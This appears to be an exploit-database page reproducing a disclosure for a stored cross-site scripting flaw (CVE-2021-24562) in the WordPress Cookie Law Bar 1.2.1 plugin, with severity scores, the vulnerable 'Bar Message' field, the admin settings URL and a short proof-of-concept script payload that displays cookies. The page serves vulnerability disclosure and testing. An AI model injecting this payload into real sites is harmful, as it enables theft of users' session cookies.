Advertisement






WordPress Cookie Law Bar 1.2.1 Cross Site Scripting

CVE Category Price Severity
CVE-2021-24562 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-05-25
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N 0.02192 0.50147

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050134

Below is a copy:

WordPress Cookie Law Bar 1.2.1 Cross Site Scripting
# Exploit Title: WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)
# Date: 2021-05-24
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.cookielawinfo.com/wordpress-plugin/
# Software Link: https://wordpress.org/plugins/cookie-law-bar/
# Version: 1.2.1
# Tested on: Ubuntu 16.04 LTS, Wordpress 5.7.2

# the "Bar Message" text field is vulnerable to stored XSS due to unsanitized user input
# an authenticated attacker can retrieve cookies / sensitive data of all Wordpress users

# proof of concept
# navigate to the settings of the Cookie Law Bar under

http://localhost/wp-admin/options-general.php?page=clb

# inject the payload: </script><script>alert(document.cookie)</script> into the "Bar Message field" and save it

# browsing through the Wordpress pages shows the cookies

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum